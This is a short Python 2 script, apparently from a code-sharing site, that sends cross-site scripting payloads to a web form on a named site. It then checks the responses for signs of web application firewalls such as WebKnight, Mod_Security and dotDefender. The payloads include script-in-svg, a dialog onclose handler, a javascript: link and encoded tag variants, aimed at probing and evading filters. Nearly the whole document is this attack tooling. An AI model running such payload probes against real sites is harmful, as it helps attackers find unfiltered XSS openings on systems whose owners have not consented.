RAW Code

1. # Author : Asif Nawaz
2. # Blog : http://viru5hax.blogspot.com/
3. # Date : 6/1/2017
4. import mechanize as mec
5.  
6. maliciousRequest = mec.Browser()
7.  
8. formName = 'waf'
9.  
10. maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
11.  
12. maliciousRequest.select_form(formName)
13.  
14.  
15. crossSiteScriptingPayLoad = "<svg><script>alert&grave;1&grave;<p>"
16.  
17. maliciousRequest.form['data'] = crossSiteScriptingPayLoad
18.  
19.  
20.  
21. maliciousRequest.submit()
22. response =  maliciousRequest.response().read()
23.  
24. print response
25.  
26.  
27. if response.find('WebKnight') >= 0:
28.     print "Firewall detected: WebKnight"
29. elif response.find('Mod_Security') >= 0:
30.     print "Firewall detected: Mod Security"
31. elif response.find('Mod_Security') >= 0:
32.     print "Firewall detected: Mod Security"
33. elif response.find('dotDefender') >= 0:
34.     print "Firewall detected: Dot Defender"
35. else:
36.     print "No Firewall Present"
37.  
38.  
39.  
40. listofPayloads = ['<dialog open="" onclose="alert(1)"><form method="dialog"><button>Close me!</button></form></dialog>', '<svg><script>prompt&#40 1&#41<i>', '<a href="&#1;javascript:alert(1)">CLICK ME<a>']
41.  
42. for payLoads in listofPayloads:
43.  
44.     maliciousRequest = mec.Browser()
45.  
46.     formName = 'waf'
47.  
48.     maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
49.  
50.     maliciousRequest.select_form(formName)
51.  
52.     maliciousRequest.form['data'] = payLoads
53.  
54.     maliciousRequest.submit()
55.  
56.     response = maliciousRequest.response().read()
57.  
58.     print "---------------------------------------------------"
59.  
60.     if response.find('WebKnight') >= 0:
61.         print "Firewall detected: WebKnight"
62.     elif response.find('Mod_Security') >= 0:
63.         print "Firewall detected: Mod Security"
64.     elif response.find('Mod_Security') >= 0:
65.         print "Firewall detected: Mod Security"
66.     elif response.find('dotDefender') >= 0:
67.         print "Firewall detected: Dot Defender"
68.     else:
69.         print "No Firewall Present"
70.  
71.     print "---------------------------------------------------"
72.  
73.  
74. listofPayloads = ['&lt;b&gt;','\u003cb\u003e','\x3cb\x3e']
75.  
76. for payLoads in listofPayloads:
77.  
78.     maliciousRequest = mec.Browser()
79.  
80.     formName = 'waf'
81.  
82.     maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
83.  
84.     maliciousRequest.select_form(formName)
85.  
86.     maliciousRequest.form['data'] = payLoads
87.  
88.     maliciousRequest.submit()
89.  
90.     response = maliciousRequest.response().read()
91.  
92.     print "---------------------------------------------------"
93.  
94.     print response
95.  
96.     print "---------------------------------------------------"